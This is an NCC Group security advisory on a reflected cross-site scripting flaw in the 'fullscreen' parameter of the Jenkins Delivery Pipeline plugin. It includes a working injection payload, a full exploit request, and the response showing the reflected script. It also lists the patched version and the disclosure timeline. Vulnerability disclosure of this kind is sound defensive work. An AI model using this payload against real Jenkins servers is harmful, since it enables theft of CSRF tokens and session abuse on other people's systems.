Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin

Vendor: Jenkins Delivery Pipeline Plugin

Vendor URL: https://plugins.jenkins.io/delivery-pipeline-plugin

Versions affected: 1.0.7 (up to and including)

Systems Affected: Jenkins

Author: Viktor Gazdag viktor.gazdag[at]nccgroup[dot]trust

Advisory URL / CVE Identifier: https://jenkins.io/security/advisory/2017-11-16/

Risk: Medium - 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) (Reflected Cross-Site Scripting)

Summary

The Delivery Pipeline Plugin is a Jenkins plugin that helps visualizing the delivery/build pipelines. A parameter of the plugin is vulnerable to reflected cross-site scripting and depending on the configuration, can allow authenticated or unauthenticated attackers to inject JavaScript code into the webpage.

Location

The parameter called ‘fullscreen’ found in the Delivery Pipeline Plugin was found to be vulnerable.

Impact

The vulnerability allows authenticated or unauthenticated (depending on the configuration) attackers to inject JavaScript code, such as extraction and theft of the CSRF token called ‘crumb’ from the webpage.

Details

An example URL of the view is: http://hostname:8443/view/OMITTED-pipeline/?fullscreen=true
Basic code to show a popup window can be created with the following payload:

,1,1,false,null,30000,0,jsplumb);alert($('%23test'));pipelineutils.updatePipelines(pipelineContainers,%20"pipelineerror-",%20+%20pipelineid,%20view<

The following GET request and response shows an example of how the vulnerability might be exploited:

GET /view/OMITTED-pipeline/?fullscreen=true,1,1,false,null,30000,0,jsplumb);alert($('%23test'));pipelineutils.updatePipelines(pipelineContainers,%20"pipelineerror-",%20+%20pipelineid,%20view HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: screenResolution=1920x1080; jenkins-timestamper-offset=-3600000; jenkins-timestamper=system; jenkins-timestamper-local=false; JSESSIONID.3dad5835=node0polduo6f03521qemnwxzxsuq71517.node0; screenResolution=1920x1080
Connection: close
Upgrade-Insecure-Requests: 1

The pipelineutils.updatePipelines() function in the response contains the submitted payload and will show a popup window:

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Tue, 26 Sep 2017 16:51:28 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 15251
Connection: close
X-Content-Type-Options: nosniff
Expires: 0
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
X-Hudson: 1.395
X-Jenkins: 2.78
X-Jenkins-Session: e6f83b99
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAkMubT4QgTWD1/LNMG5xdhX7n5Gzw4NmUubl6lS21l4EWkTZt3CDn8loWsgv++j4avamvNbzV6AvKqf9SPWnSjwRFk0ndm5B8rV2wrxFiQqxx83TGiQ3m0Xj8+PYBX7Vo6WgvQ7CSm/fbVK4Pn9OsVeacQffh6bROrKjW1hXP/ycEvsjKLGkLvxyrz65qe6rP9sjvjkxxRO1Dr+hbQS2PjyOS4rlpqL0pQWHfHlnxu415G4N3Iqwqt0aFu7iYtAgwa1GMO9OKwgNqGCcq2NoOg1FmLfTNC96uD0f+y+wz6kjz6aMg0jcMm4OaC6/39QdbXSWCLzrjj6zSfdIxU+oQfwIDAQAB
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

...OMITTED DATA...

"><div class="pipeline-loading-icon"></div></div><div style="width: 100.0%;" id="pipelines-1-0" class="left"></div><div class="clear"></div><script type="text/javascript">
function pipeline0(pipelineid, viewUrl) {

                                      var pipelineContainers = [];
                                      var jsplumb = jsPlumb.getInstance();
                                      jsPlumbUtilityVariable.push(jsplumb);

                                      pipelineContainers.push('pipelines-1-' + pipelineid);

                                      var view = { "viewUrl" : viewUrl };

                                      var pipelineutils = new pipelineUtils();

                                      pipelineutils.updatePipelines(pipelineContainers, "pipelineerror-" + pipelineid, view, true,1,1,false,null,30000,0,jsplumb);alert($('#test'));pipelineutils.updatePipelines(pipelineContainers, "pipelineerror-", pipelineid, view, 1, 1, false, null, 30000, 0, jsplumb);
                                     Q(window).resize(function () {
                                      jsplumb.repaintEverything();
                                      });
                                      }
                                      var jsPlumbUtilityVariable;
                                      Q(document).ready(function() {
                                               if ( undefined === jsPlumbUtilityVariable ) {
                                                     jsPlumbUtilityVariable = [];
                                               }
                                               var itpipeline0 = new
                                               pipeline0('0', 'view/OMITTED-pipeline/');
                                      });
                                </script></div></div></div></div><footer><div class="container-fluid"><div class="row"><div class="col-md-6" id="footer"></div><div class="col-md-18"><span class="page_generated">Page generated: Sep 26, 2017 5:51:28 PM BST</span><span class="rest_api"><a href="api/">REST API</a></span><span class="jenkins_ver"><a href="https://jenkins.io/">Jenkins ver. 2.78</a></span></div></div></div></footer></body></html>

Recommendation

Jenkins and the plugin developers have released a new version of the plugin which should be installed: https://repo.jenkins-ci.org/releases/se/diabol/jenkins/pipeline/delivery-pipeline-plugin/1.0.8/

Vendor Communication

2017-10-19 Advisory reported to Jenkins
2017-10-24 Acknowledgement of Core and Plugin developers
2017-11-16 Patch released

Thanks to

Gabor Pilsits

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Written by: Viktor Gazdag

Published date:  02 January 2018

comments powered by Disqus

Filter By Service

Filter By Type